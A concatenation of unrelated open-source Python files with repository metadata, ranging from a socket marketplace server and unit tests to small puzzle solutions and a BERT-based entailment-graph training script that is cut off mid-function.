'{\"status\":\"error\"}'\n if debug:\n print(response)\n self.sock.send(bytes(response,'utf-8'))\n finally:\n self.sock.close()\n\nclass SpfSendFindThread(Thread):\n ip = 'String'\n port = 'Number'\n item = 'List'\n data = None\n def __init__(self,ip,port,item):\n Thread.__init__(self)\n self.sock = socket.socket()\n self.ip = ip\n self.port = port\n self.item = item\n self.sock.settimeout(3)\n self.data = None\n\n def run(self):\n try:\n self.sock.connect((self.ip,self.port))\n jstring = '{\"method\":\"findoffer\", \"item\":'+str(self.item)+'}'\n if debug:\n print(jstring)\n self.sock.send(bytes(jstring,'utf-8'))\n self.data = recievejson(self.sock)\n if debug and self.data != None:\n print(self.data)\n finally:\n self.sock.close()\n\nclass ServerThread (Thread):\n def __init__(self,addr,port,backup,db):\n Thread.__init__(self)\n self.srv = SpfServer(addr,port,backup,db)\n def run (self):\n self.srv.start()\n\ndef arghandler(argv):\n i = 2\n param = ['-db','-backup','-addr']\n while i < len(argv):\n if(argv[i]) == param[0]:\n global db\n i += 1\n if i < len(argv) and argv[i] not in param:\n db = argv[i]\n i += 1\n elif(argv[i]) == param[1]:\n global backup\n backup['value'] = True\n i += 1\n if i < len(argv) and argv[i] not in param:\n backup['ip'] = argv[i]\n i += 1\n if i < len(argv) and argv[i] not in param:\n backup['port'] = int(argv[i])\n i += 1\n else:\n backup['ip'] = ''\n elif(argv[i]) == param[2]:\n global addr\n i += 1\n if i < len(argv) and argv[i] not in param:\n addr = argv[i]\n i += 1\n\nif __name__ == \"__main__\":\n db = 'spf'\n backup = {'value':False,'ip':'','port':0}\n addr = getipaddress()\n import sys\n print(\"Arguments given: \",sys.argv)\n if len(sys.argv) < 2:\n print('Missing argument for port')\n exit()\n try:\n port = int(sys.argv[1])\n except ValueError:\n print('Invalid 
port')\n exit()\n arghandler(sys.argv)\n thr = ServerThread(addr,port,backup,db)\n thr.daemon = True\n thr.start()\n if debug:\n print('Debugging mode')\n while True:\n try:\n time.sleep(1)\n except (KeyboardInterrupt, SystemExit):\n break\n","repo_name":"daniarherikurniawan/DistributedMarketplaceApplication","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":33273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37755991996","text":"import unittest\nimport typing\nimport logging\nimport re\nfrom pydt3 import DEVONthink3\nfrom pydt3.osascript import OSAScript, OSAObjProxy, OSAObjArray\nfrom pydt3.apps.devonthink.record import Record\nfrom pydt3.apps.devonthink.smartgroup import SmartGroup\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass TestDatabase(unittest.TestCase):\n def __init__(self, methodName=\"runTest\"):\n super().__init__(methodName)\n dbs = DEVONthink3().databases\n assert len(dbs) > 0, \"No databases found\"\n self.dbs = list(dbs)\n \n def test_contents(self):\n for db in self.dbs:\n contents = db.contents\n self.assertTrue(isinstance(contents, typing.Sequence))\n self.assertTrue(all(isinstance(record, Record) for record in contents))\n \n def test_parents(self):\n for db in self.dbs:\n parents = db.parents\n self.assertTrue(isinstance(parents, typing.Sequence))\n self.assertTrue(all(isinstance(record, Record) for record in parents))\n\n def test_records(self):\n for db in self.dbs:\n records = db.records\n self.assertTrue(isinstance(records, typing.Sequence))\n self.assertTrue(all(isinstance(record, Record) for record in records))\n\n def test_smart_groups(self):\n for db in self.dbs:\n smart_groups = db.smart_groups\n self.assertTrue(isinstance(smart_groups, typing.Sequence))\n self.assertTrue(all(isinstance(smart_group, SmartGroup) for smart_group in smart_groups))\n\n def test_annotations_group(self):\n for db in self.dbs:\n annotations_group = db.annotations_group\n self.assertTrue(isinstance(annotations_group, Record))\n\n def test_comment(self):\n for db in self.dbs:\n comment = db.comment\n self.assertTrue(isinstance(comment, str))\n # Test the setter method\n old_comment = comment\n db.comment = \"test\"\n self.assertEqual(db.comment, \"test\")\n # Revert the change\n db.comment = old_comment\n\n def test_current_group(self):\n for db in self.dbs:\n current_group = db.current_group\n self.assertTrue(isinstance(current_group, Record))\n def test_encrypted(self):\n for db in self.dbs:\n encrypted = db.encrypted\n self.assertTrue(isinstance(encrypted, bool))\n\n def test_id(self):\n for db in self.dbs:\n id = db.id\n self.assertTrue(isinstance(id, int))\n\n def test_incoming_group(self):\n for db in self.dbs:\n incoming_group = db.incoming_group\n self.assertTrue(isinstance(incoming_group, Record))\n\n def test_name(self):\n for db in self.dbs:\n name = db.name\n self.assertTrue(isinstance(name, str))\n # Test the setter method\n old_name = name\n db.name = \"test\"\n self.assertEqual(db.name, \"test\")\n # Revert the change\n db.name = old_name\n\n def test_path(self):\n for db in self.dbs:\n path = db.path\n self.assertTrue(isinstance(path, str))\n self.assertTrue(re.match(r'^/.*\\.dtBase2$', path))\n\n def test_read_only(self):\n for db in self.dbs:\n read_only = db.read_only\n self.assertTrue(isinstance(read_only, bool))\n\n def test_root(self):\n for db in self.dbs:\n root = db.root\n self.assertTrue(isinstance(root, Record))\n\n 
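# The remaining special groups (tags, trash) should also come back as Record proxies.\n    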
def test_tags_group(self):\n for db in self.dbs:\n tags_group = db.tags_group\n self.assertTrue(isinstance(tags_group, Record))\n\n def test_trash_group(self):\n for db in self.dbs:\n trash_group = db.trash_group\n self.assertTrue(isinstance(trash_group, Record))\n\n def test_uuid(self):\n for db in self.dbs:\n uuid = db.uuid\n self.assertTrue(isinstance(uuid, str))\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"thekoc/devonthink-python","sub_path":"tests/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"77"} +{"seq_id":"4942715575","text":"import datetime\n\nfrom trade.logger.logger_config import log\nfrom utils_global.dingding_message import send_dingding\n\n\ndef record_log(msg, log_type='info', send=False):\n \"\"\"\n 记录日志\n :param msg: 日志信息\n :param log_type: 日志类型\n :return:\n \"\"\"\n time_str = datetime.datetime.strftime(datetime.datetime.now(), \"%H:%M:%S\")\n log_msg = time_str + ' --> ' + msg\n print(log_msg)\n if log_type == 'info':\n log.info(msg=log_msg)\n if send:\n send_dingding(log_msg)\n\n\nif __name__ == \"__main__\":\n record_log(\"测试日志\")\n","repo_name":"ironbox1995/quantitative_trading_dev_test","sub_path":"quant_test/trade/logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26207999534","text":"import json\n\nfrom diablo import db, std_commit\nfrom diablo.lib.util import utc_now\nfrom diablo.models.sis_section import SisSection\nfrom sqlalchemy import text\n\n\ndef save_mock_courses(json_file_path):\n courses = _load_mock_courses(json_file_path)\n if courses:\n for course in courses:\n section_id = course['section_id']\n if SisSection.get_course(term_id=course['term_id'], section_id=section_id):\n db.session.execute(text(f'DELETE FROM sis_sections WHERE section_id = {section_id}'))\n _save_courses(sis_sections=courses)\n std_commit(allow_test_environment=True)\n\n\ndef _load_mock_courses(json_file_path):\n with open(json_file_path, 'r') as file:\n json_ = json.loads(file.read())\n defaults = json_['defaults']\n instructors = json_['instructors']\n courses = []\n for c in json_['courses']:\n for key, value in defaults.items():\n if key not in c:\n c[key] = value\n uid = c['instructor_uid']\n if uid:\n c['instructor_name'] = instructors[uid]\n else:\n c['instructor_name'] = None\n c['instructor_role_code'] = None\n courses.append(c)\n return courses\n\n\ndef _save_courses(sis_sections):\n now = utc_now().strftime('%Y-%m-%dT%H:%M:%S+00')\n query = \"\"\"\n INSERT INTO sis_sections (\n allowed_units, course_name, course_title, created_at, deleted_at, instruction_format, instructor_name,\n instructor_role_code, instructor_uid, is_primary, meeting_days, meeting_end_date, meeting_end_time,\n meeting_location, meeting_start_date, meeting_start_time, section_id, section_num, term_id\n )\n SELECT\n allowed_units, course_name, course_title, created_at, deleted_at, instruction_format, instructor_name,\n instructor_role_code, instructor_uid, is_primary::BOOLEAN, meeting_days, meeting_end_date::TIMESTAMP,\n meeting_end_time, meeting_location, meeting_start_date::TIMESTAMP, meeting_start_time, section_id::INTEGER,\n section_num, term_id::INTEGER\n FROM json_populate_recordset(null::sis_sections, :json_dumps)\n \"\"\"\n data = [\n {\n 'allowed_units': row['allowed_units'],\n 'course_name': 
row['course_name'],\n 'course_title': row['course_title'],\n 'created_at': now,\n 'deleted_at': now if row.get('is_deleted') else None,\n 'instruction_format': row['instruction_format'],\n 'instructor_name': row['instructor_name'],\n 'instructor_role_code': row['instructor_role_code'],\n 'instructor_uid': row['instructor_uid'],\n 'is_primary': row['is_primary'],\n 'meeting_days': row['meeting_days'],\n 'meeting_end_date': row['meeting_end_date'],\n 'meeting_end_time': row['meeting_end_time'],\n 'meeting_location': row['meeting_location'],\n 'meeting_start_date': row['meeting_start_date'],\n 'meeting_start_time': row['meeting_start_time'],\n 'section_id': int(row['section_id']),\n 'section_num': row['section_num'],\n 'term_id': int(row['term_id']),\n } for row in sis_sections\n ]\n db.session.execute(query, {'json_dumps': json.dumps(data)})\n","repo_name":"ets-berkeley-edu/diablo","sub_path":"diablo/lib/development_db_utils.py","file_name":"development_db_utils.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"25165594994","text":"import sc_api as s\nimport json\nimport block\nimport cryptogr as cg\nfrom vpy.decorators import msg_handler\n\nbalances, bc, tc = {}, 0, 0\nstart = True\n\n\ndef add_task(sender, task):\n if sender == s.get_self().author:\n s.append_tasks(task)\n\n\ndef send(sender, money, to):\n if sender in balances.keys():\n if balances[sender] > money and money > 0:\n balances[sender] -= money\n balances[to] += money\n\n\ndef sell(sender, money):\n if sender in balances.keys():\n if balances[sender] >= money:\n balances[sender] -= money\n s.tnx([sender], [money])\n write()\n\n\n@msg_handler\ndef handle(sender, msg):\n if msg[0] == 'sell':\n sell(sender, msg[1])\n elif msg[0] == 'send':\n send(sender, msg[1], msg[2])\n elif msg[0] == 'add_task':\n add_task(sender, msg[1])\n\n\nbalances['0'] = 0.2\nwhile True: # IF WHILE TRUE DETECTED, IT WILL BE USED AS MAIN TASK\n if not start:\n if tc != len(s.bch[bc-1].txs):\n for tnx in s.bch[bc-1].txs[tc:len(s.bch[bc-1].txs)]:\n if 'sc' + str(ind) in tnx.outs:\n try:\n balances[tnx.author] += tnx.outns[tnx.outs.index('sc' + str(ind))]\n except:\n balances[tnx.author] = tnx.outns[tnx.outs.index('sc' + str(ind))]\n if start:\n start = False\n if bc != len(s.bch):\n for i in range(bc, len(s.bch)):\n for tnx in s.bch[i].txs:\n if 'sc' + str(ind) in tnx.outs:\n try:\n balances[tnx.author] += tnx.outns[tnx.outs.index('sc' + str(ind))]\n except:\n balances[tnx.author] = tnx.outns[tnx.outs.index('sc' + str(ind))]\n","repo_name":"hodleum/hodl","sub_path":"tests/scex.py","file_name":"scex.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"13213004899","text":"\nimport re\n\nf = open('input')\ndata = f.readlines()\n\ns = 0\n\nfor l in data:\n\n if not l or l == '\\n':\n break\n\n r = re.match('(\\d+)-(\\d+),(\\d+)-(\\d+)\\n', l)\n (l1, l2, r1, r2) = r.group(1, 2, 3, 4)\n (l1, l2, r1, r2) = (int(l1), int(l2), int(r1), int(r2))\n\n # left contained in right\n if l1 >= r1 and l2 <= r2:\n s += 1\n\n # right contained in left\n elif r1 >= l1 and r2 <= l2:\n s += 1\n\nprint(s)\n","repo_name":"rleibl/AdventOfCode2022","sub_path":"04/aoc04_part1.py","file_name":"aoc04_part1.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4851118496","text":"# 
coding: utf-8\n\ndef read_file(Input):\n x=open(Input, 'r')\n Doc_lines=x.readlines()\n x.close()\n return(Doc_lines)\n\n#Concatenante V\ndef concaten(V):\n V2=''.join(V)\n #print(V2)\n return(V2)\n\n#Collect the string corresponding to tmin or tmax\ndef past_append(MinorMax, Limite, j):\n y=0\n past=[]\n if j==1:\n while MinorMax[y]!=',':\n y+=1\n y+=1\n while (MinorMax[y]!=Limite):\n past.append(MinorMax[y])\n y+=1\n #print(y)\n return(past)\n\ndef define_time(Doc_lines, string, tmax):\n i=0\n time=[]\n while i <(len(Doc_lines)-2):\n TimeA=past_append(Doc_lines[i],string,tmax)\n TimeB=concaten(TimeA)\n time.append(TimeB)\n i+=1\n return(time)\n\ndef a_ecrire(Tmax, Tmin):\n Tmax=float(Tmax)\n Tmin=float(Tmin)\n if Tmax>180 and Tmin<240:\n if Tmin<180:\n Tmin=180\n if Tmax>240:\n Tmax=240\n Insert=(str(Tmin),'Speech','1',str(Tmax))\n else:\n Insert=\"NA\"\n return(Insert)\n\ndef create_speech(tmax, tmin):\n Insert=[]\n speech=[]\n i=0\n while i> channel, patchcount_x, patchcount_y, patchsize_x, patchsize_y\n #print(\"Patches list dimension\", patches.shape, \"and size\", torch.prod(torch.tensor(patches.shape)))\n patches = patches.reshape(-1, 3, patch_size, patch_size)\n #print(\"After resize: Patches list dimension\", patches.shape)\n \n # now reading the corresponding segmentation mask of the image and extract patches\n img_name = ID.split('/')[-1]\n img_id = img_name.split('.')[0]\n mask_name = img_id + \"_mask.txt\"\n mask_path = \"/\".join(ID.split('/')[:-1]) + \"/{}\".format(mask_name)\n #print(\"Mask path is\", mask_path)\n \n # now read the mask\n if ID in self.mag20x:\n # double the mask size to 40x\n height = 2*height\n width = 2*width\n mask = np.zeros((height * width))\n j = -1 \n with open(mask_path) as file: \n for line in file: \n # print(line) \n if j >= 0: # skip first line, first line is image size \n # also binarize the mask\n mask[j] = 1 if int(line) > 0 else 0\n j += 1\n mask = mask.reshape(height, width)\n mask = torch.from_numpy(mask)\n \n #print(\"Mask: shape is\", mask.shape)\n \n # now extract patches out of the mask\n mask_patches = mask.unfold(0, patch_size, stride).unfold(1, patch_size, stride)\n #print(\"Mask: Patches list dimension\", mask_patches.shape, \"and size\", torch.prod(torch.tensor(mask_patches.shape)))\n mask_patches = mask_patches.reshape(-1, 1, patch_size, patch_size)\n #print(\"Mask: After resize: Patches list dimension\", mask_patches.shape)\n \n return [patches, mask_patches], y","repo_name":"vdhyani96/miccai_poc","sub_path":"scripts/my_classes.py","file_name":"my_classes.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74706720568","text":"import xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\n\n# tree = ET.parse('xml_files/ECFR-title1.xml')\n# root = tree.getroot()\n#\n#\n# for main_child in root[1]:\n# for child in main_child1:\n# print(child)\nwith open('xml_files/ECFR-title1.xml', 'r', encoding='utf8') as f:\n read_data = f.read()\n\ndata = BeautifulSoup(read_data, \"xml\")\n\n# print(data.find_all(\"HEAD\")[0].parent.attrs)\n#\nlink_data = []\nfor title in data.find_all(\"HEAD\")[0:10]:\n print(title.parent.attrs)\n print(title)\n temp_dict = title.parent.attrs\n temp_dict['title'] = title.text\n link_data.append(temp_dict)\n # break\n# print(data_dict)\n\nprint(data.find(attrs={\"N\": \"§ 2.2\"})) # important\n\n# for title in data.find_all(\"DIV8\", {\"N\": \"§ 5.10\"}):\n# print(title.text.strip())\n\n\n# for i in 
range(1,21):\n# for title in data.find_all(f\"DIV{i}\")[0:10]:\n# print(title)\n# break\n# break\n","repo_name":"ForhadIsrafil/webapp-for-read-xml---load-on-html-template","sub_path":"second_project/handle_xml.py","file_name":"handle_xml.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23198621268","text":"\"\"\" Special Pythagorean triplet\nProblem 9\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\n\na^2 + b^2 = c^2\nFor example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\nANSWER: 31875000\n\"\"\"\n\nimport math\n\ndef get_hypotenuse(target):\n a = 1\n b = 2\n for b in range(1, target):\n for a in range(1, b):\n c = math.sqrt(a**2 + b**2)\n # print(f'c={c}, b={b}, a={a}')\n if(a + b + c) == target:\n return int(a * b * c)\n\nprint(get_hypotenuse(1000))","repo_name":"SRFowler/project-euler-python","sub_path":"solutions/euler9.py","file_name":"euler9.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"674882735","text":"\"\"\"\nCompute QID counts.\n\nHelper function that computes a dictionary of QID -> count in training data.\n\nIf a QID is not in this dictionary, it has a count of zero.\n\"\"\"\n\nimport argparse\nimport multiprocessing\nfrom collections import defaultdict\n\nimport ujson\nfrom tqdm.auto import tqdm\n\nfrom bootleg.utils import utils\n\n\ndef parse_args():\n \"\"\"Parse args.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--train_file\",\n type=str,\n default=\"/dfs/scratch0/lorr1/projects/bootleg-data/data/wiki_title_0114/train.jsonl\",\n )\n parser.add_argument(\n \"--out_file\",\n type=str,\n default=\"/dfs/scratch0/lorr1/projects/bootleg-data/data/wiki_title_0114/train_qidcnt.json\",\n help=\"Regularization of each qid\",\n )\n\n args = parser.parse_args()\n return args\n\n\ndef get_counts(num_processes, file):\n \"\"\"Get true anchor slice counts.\"\"\"\n pool = multiprocessing.Pool(processes=num_processes)\n num_lines = sum(1 for _ in open(file))\n qid_cnts = defaultdict(int)\n for res in tqdm(\n pool.imap_unordered(get_counts_hlp, open(file), chunksize=1000),\n total=num_lines,\n desc=\"Gathering counts\",\n ):\n for qid in res:\n qid_cnts[qid] += res[qid]\n pool.close()\n pool.join()\n return qid_cnts\n\n\ndef get_counts_hlp(line):\n \"\"\"Get count helper.\"\"\"\n res = defaultdict(int) # qid -> cnt\n line = ujson.loads(line)\n for qid in line[\"qids\"]:\n res[qid] += 1\n return res\n\n\ndef main():\n \"\"\"Run.\"\"\"\n args = parse_args()\n print(ujson.dumps(vars(args), indent=4))\n num_processes = int(0.8 * multiprocessing.cpu_count())\n print(f\"Getting slice counts from {args.train_file}\")\n qid_cnts = get_counts(num_processes, args.train_file)\n utils.dump_json_file(args.out_file, qid_cnts)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HazyResearch/bootleg","sub_path":"bootleg/utils/preprocessing/get_train_qid_counts.py","file_name":"get_train_qid_counts.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"77"} +{"seq_id":"11137769427","text":"# coding=utf-8\n# This code is adapted from Huggingface transformer's codebase\n# 
(https://github.com/huggingface/transformers/blob/master/examples/pytorch/multiple-choice/run_swag.py) for the\n# contextual link prediction and entailment graph learning tasks.\n\"\"\" Finetuning the library models for contextual link prediction (Bert) and using the results to build entailment graphs.\"\"\"\n\nimport argparse\nimport glob\nimport logging\nimport os\nimport random\nimport sys\n\nsys.path.append(\"..\")\nsys.path.append(\".\")\n\nimport numpy as np\nimport torch\n\nfrom sklearn.metrics import average_precision_score\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm, trange\nfrom collections import defaultdict\n\nfrom transformers import (\n AdamW,\n BertTokenizer,\n get_linear_schedule_with_warmup,\n)\n\nfrom modeling_bert_contextual_link_pred import BertForEntGraphs, BertConfig\n\nfrom utils_contextual_link_pred import News_Iterable_Dataset, EntGraphAggregator, PreBuiltEntGraphCollection\n\ntry:\n from torch.utils.tensorboard import SummaryWriter\nexcept ImportError:\n from tensorboardX import SummaryWriter\n\nlogger = logging.getLogger(__name__)\n\nMODEL_CLASSES = {\n \"bert\": (BertConfig, BertForEntGraphs, BertTokenizer),\n}\n\n\ndef _simple_accuracy(preds, labels):\n return (preds == labels).mean()\n\n\ndef _set_seed(args):\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.n_gpu > 0:\n torch.cuda.manual_seed_all(args.seed)\n\n\ndef evaluate(args, model, iter_eval_dataloader, eval_dataset, eval_file, prefix=\"\", prebuilt_entgr_col=None,\n reset=False, tokenizer=None):\n # multi-gpu evaluate\n if args.n_gpu > 1 and model:\n model = torch.nn.DataParallel(model)\n\n # Computing Entailment Scores!\n logger.info(\"***** Evaluating Entailmet Scores {} *****\".format(prefix))\n # logger.info(\" Num examples = %d\", len(all_dataset))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n eval_loss = 0.0\n nb_eval_steps = 0\n\n preds = None\n out_labels = None\n batch_orig = None\n\n # for step, batch_orig in enumerate(tqdm_obj):\n for step in range(args.num_batches_eval):\n try:\n batch_orig = next(iter_eval_dataloader)\n except StopIteration:\n if eval_dataset.finished and reset:\n print(\"RESETTING evaluate_dataset and eval_dataloader\")\n eval_dataset = get_iterable_dataset(args, eval_dataset.entgrAgg, evaluate=True, tokenizer=tokenizer)\n iter_eval_dataloader = iter(DataLoader(eval_dataset, batch_size=args.eval_batch_size))\n batch_orig = next(iter_eval_dataloader)\n else:\n batch_orig = None\n break\n\n batch_orig = tuple(t for t in batch_orig.values())\n\n ent_scores_model = ent_scores_entgraph = None\n\n if model:\n model.eval()\n with torch.no_grad():\n batch = tuple(t.to(args.device) for t in batch_orig)\n inputs = {\n \"input_ids\": batch[0],\n \"attention_masks\": batch[1],\n \"pred_cntx_idxes\": batch[3],\n \"labels\": batch[4],\n \"label_idxes\": batch[5],\n \"pred_cntx_idxes_end\": batch[8],\n \"linear_masks\": batch[9]\n }\n\n if args.contextual_hyp:\n inputs.update({\n \"hyp_ids\": batch[10],\n \"hyp_attention_masks\": batch[11],\n \"hyp_start_idxes\": batch[12],\n \"hyp_end_idxes\": batch[13]\n })\n\n outputs = model(**inputs)\n ent_scores_model = outputs[-1]\n ent_scores_model = ent_scores_model.detach().cpu().numpy()\n\n tmp_eval_loss = outputs[0]\n eval_loss += tmp_eval_loss.mean().item()\n if prebuilt_entgr_col: # evaluating with pre-built entailment graph collection\n 
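# look up entailment scores for this batch from the pre-built entailment graphs\n                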
ent_scores_entgraph = prebuilt_entgr_col.get_ent_scores(batch_orig)\n\n        if model and prebuilt_entgr_col:\n            ent_scores = ent_scores_model * (1 - args.beta_comb) + args.beta_comb * ent_scores_entgraph\n        elif model:\n            ent_scores = ent_scores_model\n        else:\n            ent_scores = ent_scores_entgraph\n\n        nb_eval_steps += 1\n\n        print(\"current batch size: \" + str(eval_dataset.current_batch_size))\n\n        ent_scores = ent_scores[:eval_dataset.current_batch_size]\n\n        labels = batch_orig[4].numpy()[:eval_dataset.current_batch_size]\n\n        eval_dataset.entgrAgg.set_self_score_one(ent_scores, batch_orig)\n\n        if preds is None:\n            preds = ent_scores\n            out_labels = labels\n        else:\n            preds = np.append(preds, ent_scores, axis=0)\n            out_labels = np.append(out_labels, labels, axis=0)\n\n        print(\"eval step: \" + str(step))\n\n    if batch_orig:\n        if args.write_output:\n            eval_dataset.entgrAgg.report_eval_scores(batch_orig, preds, eval_dataset.current_batch_size)\n        eval_loss = eval_loss / nb_eval_steps\n        AP = average_precision_score(out_labels, preds, average=\"samples\")\n        preds[preds >= .5] = 1.0\n        preds[preds < .5] = 0.0\n        acc = _simple_accuracy(preds, out_labels)\n        results = {\"eval_acc\": acc, \"eval_loss\": eval_loss, \"eval_AP\": AP}\n        print(\"writing to eval_file\")\n        eval_file.write(str(AP) + \"\\t\" + str(eval_loss) + \"\\t\" + str(\n            (eval_dataset.current_batch_size) / eval_dataset.batch_size) + \"\\n\")\n        eval_file.flush()\n    else:\n        results = None\n\n    return results, iter_eval_dataloader, eval_dataset\n\n\ndef build_entgraphs(args, all_dataset, model, entgrAgg, prefix=\"\"):\n    if args.entscore_mode == \"contextual\":\n        args.entgraph_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n    else:\n        args.entgraph_batch_size = args.per_gpu_batch_size\n\n    all_dataloader = DataLoader(all_dataset, batch_size=args.entgraph_batch_size)\n\n    print(\"len(all_dataloader)\", len(all_dataloader))\n    print(\"len(all_dataset)\", len(all_dataset))\n\n    # multi-gpu evaluate\n    if args.n_gpu > 1 and model:\n        model = torch.nn.DataParallel(model)\n\n    # Computing Entailment Scores!\n    logger.info(\"***** Building Entailment Graphs {} *****\".format(prefix))\n    # logger.info(\" Num examples = %d\", len(all_dataset))\n    logger.info(\" Batch size = %d\", args.entgraph_batch_size)\n\n    eval_loss = 0.0\n    nb_eval_steps = 0\n\n    for step, batch_orig in enumerate(tqdm(all_dataloader, desc=\"Ent Graph Building\")):\n        if model:\n            model.eval()\n        batch_orig = tuple(t for t in batch_orig.values())\n\n        # if step == 1000:\n        #     break\n\n        if args.entscore_mode == \"contextual\":\n\n            with torch.no_grad():\n                batch = tuple(t.to(args.device) for t in batch_orig)\n                inputs = {\n                    \"input_ids\": batch[0],\n                    \"attention_masks\": batch[1],\n                    \"pred_cntx_idxes\": batch[3],\n                    \"labels\": None,\n                    \"label_idxes\": batch[5],\n                    \"pred_cntx_idxes_end\": batch[8],\n                    \"linear_masks\": batch[9]\n                }\n\n                outputs = model(**inputs)\n                ent_scores = outputs[-1].detach().cpu()\n\n        elif args.entscore_mode == \"binary\":\n            ent_scores = batch_orig[4]  # labels!\n        else:\n            raise Exception(\"not implemented!\")\n\n        entgrAgg.update_entgraph(batch_orig, ent_scores)\n\n        nb_eval_steps += 1\n\n    eval_loss = eval_loss / nb_eval_steps\n\n    print(\"eval_loss average: \", eval_loss)\n\n    entgrAgg.write_graphs(args.entgraph_dir)\n\n\ndef train(args, train_dataset, eval_dataset, model, tokenizer):\n    \"\"\" Train the model \"\"\"\n    if args.local_rank in [-1, 0]:\n        tb_writer = SummaryWriter()\n\n    args.train_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n    train_dataloader = DataLoader(train_dataset, 
batch_size=args.train_batch_size)\n\n eval_file = open(\"eval_\" + args.output_dir.split(\"/\")[1] + \".txt\", \"w\")\n\n iter_eval_dataloader = None\n if args.evaluate_during_training:\n args.eval_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n eval_dataloader = DataLoader(eval_dataset, batch_size=args.eval_batch_size)\n iter_eval_dataloader = iter(eval_dataloader)\n\n if args.max_steps > 0:\n t_total = args.max_steps\n args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1\n else:\n t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs\n\n print(\"t_total: \", t_total)\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if\n not any(nd in n for nd in no_decay) and not \"encoder.layer\" in n],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if\n not any(nd in n for nd in no_decay) and \"encoder.layer\" in n],\n \"weight_decay\": args.weight_decay,\n \"lr\": args.learning_rate * args.ctx_lr_ratio\n },\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], \"weight_decay\": 0.0},\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n scheduler = get_linear_schedule_with_warmup(\n optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total\n )\n if args.fp16:\n try:\n from apex import amp\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.\")\n model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)\n\n # multi-gpu training (should be after apex fp16 initialization)\n if args.n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n # Distributed training (should be after apex fp16 initialization)\n if args.local_rank != -1:\n model = torch.nn.parallel.DistributedDataParallel(\n model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True\n )\n\n # Train!\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", len(train_dataset))\n logger.info(\" Num Epochs = %d\", args.num_train_epochs)\n logger.info(\" Instantaneous batch size per GPU = %d\", args.per_gpu_batch_size)\n logger.info(\n \" Total train batch size (w. 
parallel, distributed & accumulation) = %d\",\n args.train_batch_size\n * args.gradient_accumulation_steps\n * (torch.distributed.get_world_size() if args.local_rank != -1 else 1),\n )\n logger.info(\" Gradient Accumulation steps = %d\", args.gradient_accumulation_steps)\n logger.info(\" Total optimization steps = %d\", t_total)\n\n global_step = 0\n tr_loss, logging_loss = 0.0, 0.0\n best_dev_acc = 0.0\n best_steps = 0\n model.zero_grad()\n train_iterator = trange(int(args.num_train_epochs), desc=\"Epoch\", disable=args.local_rank not in [-1, 0])\n _set_seed(args) # Added here for reproductibility\n for epoch in train_iterator:\n epoch_iterator = tqdm(train_dataloader, desc=\"Iteration\", disable=args.local_rank not in [-1, 0])\n for step, batch in enumerate(epoch_iterator):\n model.train()\n batch = tuple(t.to(args.device) for t in batch.values())\n inputs = {\n \"input_ids\": batch[0],\n \"attention_masks\": batch[1],\n \"pred_cntx_idxes\": batch[3],\n \"labels\": batch[4],\n \"label_idxes\": batch[5],\n \"pred_cntx_idxes_end\": batch[8],\n \"linear_masks\": batch[9]\n }\n\n if args.contextual_hyp:\n inputs.update({\n \"hyp_ids\": batch[10],\n \"hyp_attention_masks\": batch[11],\n \"hyp_start_idxes\": batch[12],\n \"hyp_end_idxes\": batch[13]\n })\n\n outputs = model(**inputs)\n loss = outputs[0] # model 